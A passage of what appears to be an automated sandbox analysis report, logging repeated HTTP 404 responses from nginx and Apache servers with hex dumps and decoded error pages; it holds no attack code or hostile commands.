            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 16:02:41 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3fcf-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 16:02:44 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3fcf-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 16:02:46 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3fcf-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 16:02:49 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3fcf-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 16:02:49 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3fcf-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 16:02:55 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 7a 6e 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /znmp/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 16:02:57 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 7a 6e 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /znmp/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 16:03:00 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 7a 6e 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /znmp/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 16:03:03 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 7a 6e 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /znmp/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 16:03:09 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 16:03:11 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 16:03:14 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 16:03:16 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sun, 22 Sep 2024 16:03:30 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-09-22T16:03:35.2633987Z
